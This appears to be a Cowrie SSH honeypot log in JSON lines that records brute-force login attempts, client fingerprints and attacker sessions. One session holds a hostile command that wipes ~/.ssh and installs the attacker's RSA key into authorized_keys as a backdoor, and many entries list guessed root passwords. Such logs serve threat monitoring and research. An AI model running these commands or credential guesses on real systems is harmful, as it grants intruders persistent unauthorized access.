{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:01:33.698438Z","src_ip":"212.227.235.229","session":"9e0155d3113a"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty654321","message":"login attempt [root/Qwerty654321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:01:35.208003Z","src_ip":"212.227.235.229","session":"9e0155d3113a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:01:35.767270Z","src_ip":"212.227.235.229","session":"9e0155d3113a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:01:35.767986Z","src_ip":"212.227.235.229","session":"9e0155d3113a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:01:35.768764Z","src_ip":"212.227.235.229","session":"9e0155d3113a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:36.005832Z","src_ip":"212.227.235.229","session":"9e0155d3113a"}
{"eventid":"cowrie.session.connect","src_ip":"103.226.249.77","src_port":3248,"dst_ip":"1.2.3.4","dst_port":22,"session":"e02514c0eeaa","protocol":"ssh","message":"New connection: 103.226.249.77:3248 (1.2.3.4:22) [session: e02514c0eeaa]","sensor":"my-vps","timestamp":"2025-09-09T02:01:36.337198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:01:36.337823Z","src_ip":"103.226.249.77","session":"e02514c0eeaa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:01:36.548247Z","src_ip":"103.226.249.77","session":"e02514c0eeaa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:01:36.990345Z","src_ip":"212.227.235.229","session":"9e0155d3113a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:01:36.991067Z","src_ip":"212.227.235.229","session":"9e0155d3113a"}
{"eventid":"cowrie.login.success","username":"root","password":"convidado","message":"login attempt [root/convidado] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:01:37.204017Z","src_ip":"103.226.249.77","session":"e02514c0eeaa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:01:37.242872Z","src_ip":"212.227.235.229","session":"9e0155d3113a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:37.243829Z","src_ip":"212.227.235.229","session":"9e0155d3113a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43514,"dst_ip":"1.2.3.4","dst_port":22,"session":"b48b083f6c18","protocol":"ssh","message":"New connection: 212.227.235.229:43514 (1.2.3.4:22) [session: b48b083f6c18]","sensor":"my-vps","timestamp":"2025-09-09T02:01:37.499635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:01:37.501527Z","src_ip":"212.227.235.229","session":"b48b083f6c18"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:37.625727Z","src_ip":"103.226.249.77","session":"e02514c0eeaa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:01:37.742433Z","src_ip":"212.227.235.229","session":"b48b083f6c18"}
{"eventid":"cowrie.session.connect","src_ip":"103.226.249.77","src_port":12444,"dst_ip":"1.2.3.4","dst_port":22,"session":"23ccedfb616f","protocol":"ssh","message":"New connection: 103.226.249.77:12444 (1.2.3.4:22) [session: 23ccedfb616f]","sensor":"my-vps","timestamp":"2025-09-09T02:01:37.829489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:01:37.830289Z","src_ip":"103.226.249.77","session":"23ccedfb616f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:01:38.049457Z","src_ip":"103.226.249.77","session":"23ccedfb616f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:01:38.755661Z","src_ip":"212.227.235.229","session":"b48b083f6c18"}
{"eventid":"cowrie.login.success","username":"root","password":"convidado","message":"login attempt [root/convidado] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:01:38.966480Z","src_ip":"103.226.249.77","session":"23ccedfb616f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:01:39.422214Z","src_ip":"103.226.249.77","session":"23ccedfb616f"}
{"eventid":"cowrie.command.input","input":"echo TEST","message":"CMD: echo TEST","sensor":"my-vps","timestamp":"2025-09-09T02:01:39.423045Z","src_ip":"103.226.249.77","session":"23ccedfb616f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/20b052c7ab0867879e0d764da8c96e2a9d955af1d010a4423e8ffb5952625514","size":5,"shasum":"20b052c7ab0867879e0d764da8c96e2a9d955af1d010a4423e8ffb5952625514","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/20b052c7ab0867879e0d764da8c96e2a9d955af1d010a4423e8ffb5952625514 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:39.642996Z","src_ip":"103.226.249.77","session":"23ccedfb616f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:39.644460Z","src_ip":"103.226.249.77","session":"23ccedfb616f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:40.029089Z","src_ip":"212.227.235.229","session":"b48b083f6c18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53884,"dst_ip":"1.2.3.4","dst_port":22,"session":"e08a9174b5a3","protocol":"ssh","message":"New connection: 212.227.235.229:53884 (1.2.3.4:22) [session: e08a9174b5a3]","sensor":"my-vps","timestamp":"2025-09-09T02:01:40.278759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:01:41.300929Z","src_ip":"212.227.235.229","session":"e08a9174b5a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:01:41.301575Z","src_ip":"212.227.235.229","session":"e08a9174b5a3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:01:42.346197Z","src_ip":"212.227.235.229","session":"e08a9174b5a3"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:43.042600Z","src_ip":"212.227.235.229","session":"9e0155d3113a"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:43.675598Z","src_ip":"212.227.235.229","session":"e08a9174b5a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53418,"dst_ip":"1.2.3.4","dst_port":22,"session":"f447e9f8f66c","protocol":"ssh","message":"New connection: 212.227.235.229:53418 (1.2.3.4:22) [session: f447e9f8f66c]","sensor":"my-vps","timestamp":"2025-09-09T02:01:58.855507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:01:58.856258Z","src_ip":"212.227.235.229","session":"f447e9f8f66c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:01:58.963664Z","src_ip":"212.227.235.229","session":"f447e9f8f66c"}
{"eventid":"cowrie.login.failed","username":"test","password":"111111","message":"login attempt [test/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T02:01:59.436731Z","src_ip":"212.227.235.229","session":"f447e9f8f66c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:02:00.546396Z","src_ip":"212.227.235.229","session":"f447e9f8f66c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37292,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d247230dd28","protocol":"ssh","message":"New connection: 212.227.235.229:37292 (1.2.3.4:22) [session: 7d247230dd28]","sensor":"my-vps","timestamp":"2025-09-09T02:02:10.190309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:02:10.191885Z","src_ip":"212.227.235.229","session":"7d247230dd28"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:02:10.457045Z","src_ip":"212.227.235.229","session":"7d247230dd28"}
{"eventid":"cowrie.login.failed","username":"ahmad","password":"12345678","message":"login attempt [ahmad/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T02:02:11.520515Z","src_ip":"212.227.235.229","session":"7d247230dd28"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:02:12.788454Z","src_ip":"212.227.235.229","session":"7d247230dd28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34260,"dst_ip":"1.2.3.4","dst_port":22,"session":"8210a91779aa","protocol":"ssh","message":"New connection: 212.227.235.229:34260 (1.2.3.4:22) [session: 8210a91779aa]","sensor":"my-vps","timestamp":"2025-09-09T02:02:16.459007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:02:16.459766Z","src_ip":"212.227.235.229","session":"8210a91779aa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:02:16.726268Z","src_ip":"212.227.235.229","session":"8210a91779aa"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"12345678","message":"login attempt [anonymous/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T02:02:17.820626Z","src_ip":"212.227.235.229","session":"8210a91779aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43300,"dst_ip":"1.2.3.4","dst_port":22,"session":"9384766e5ecc","protocol":"ssh","message":"New connection: 212.227.235.229:43300 (1.2.3.4:22) [session: 9384766e5ecc]","sensor":"my-vps","timestamp":"2025-09-09T02:02:18.833662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:02:18.834733Z","src_ip":"212.227.235.229","session":"9384766e5ecc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 